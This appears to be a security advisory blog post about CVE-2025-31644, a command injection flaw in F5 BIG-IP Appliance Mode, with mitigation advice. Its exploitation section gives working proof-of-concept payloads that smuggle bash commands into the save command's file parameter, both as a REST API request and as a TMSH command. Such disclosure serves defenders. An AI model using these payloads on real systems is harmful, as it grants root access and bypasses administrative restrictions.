CVE-2025-31644: Command Injection Vulnerability in F5 BIG-IP (Appliance Mode)
Date: May 13, 2025
Tags: CVE-2025-31644, F5 BIG-IP, Command Injection, Appliance Mode, Exploit
Overview
A critical vulnerability identified as CVE-2025-31644 affects F5 BIG-IP systems running in Appliance Mode. It allows authenticated administrators to perform remote code execution (RCE) by exploiting command injection via the save
commandβs file
parameter.
This issue arises from unsafe handling of user-supplied values, which are passed directly into Perl scripts or shell commands, leading to exploitation using shell metacharacters.
Affected Environment
- F5 BIG-IP Version: 16.1.4.1
- Vulnerable Only in: Appliance Mode
- Required Role for Exploitation: Administrator (via REST API or TMSH over SSH)
Root Cause
The file
parameter of the save
command is not sanitized properly before being passed to system-level scripts. This allows attackers to:
- Inject commands using backticks (
`
) or other shell metacharacters
- Execute arbitrary bash commands as root
- Bypass Appliance Mode restrictions that would normally block shell access
Exploitation Vectors
1. Via REST API (/mgmt
)
Request:
POST /mgmt/tm/sys/config HTTP/1.1
Host: <target>
Authorization: Basic <admin-creds>
Content-Type: application/json
Content-Length: 148
{
"command": "save",
"options": [
{
"file": "/var/tmp/`bash'${IFS}-c${IFS}'id'|'tee'${IFS}-a${IFS}'mal_was_here`.scf",
"passphrase": "aaaa"
}
]
}
Response:
Even though the server returns a 400 Bad Request
with an encryption failure message, the injected command (id
) executes successfully and its output is logged.
2. Via TMSH (over SSH)
Command:
save sys config file /var/tmp/`bash'${IFS}-c${IFS}'id'${IFS}'>&2`.scf no-passphrase
Effect:
The id
command runs as root. Output redirection (>&2
) ensures the result is printed to STDERR, confirming success.
Key Observations
- Only administrator users can exploit this due to needing access to the
file
parameter.
- All command injection relies on embedding shell code into the
file
parameter.
- Shell metacharacters like
`
, |
, and ${IFS}
are used to evade basic filtering.
- This is only a vulnerability in Appliance Mode, where such commands should be blocked.
Mitigation
- Upgrade to Patched Version (if released by F5).
- Restrict Administrator Access to only trusted users.
- Monitor Logs for suspicious usage of the
save
command with file paths in /var/tmp/
.
- Isolate REST API Access from untrusted networks.
References
Conclusion
CVE-2025-31644 is a high-severity vulnerability that allows authenticated admin users to gain root shell access in restricted Appliance Mode environments. This vulnerability demonstrates the risks of insecure parameter handling even in tightly controlled admin interfaces. Organizations using F5 BIG-IP should audit usage, apply patches promptly, and monitor for suspicious config-saving operations.
Stay secure. Patch often. Audit always.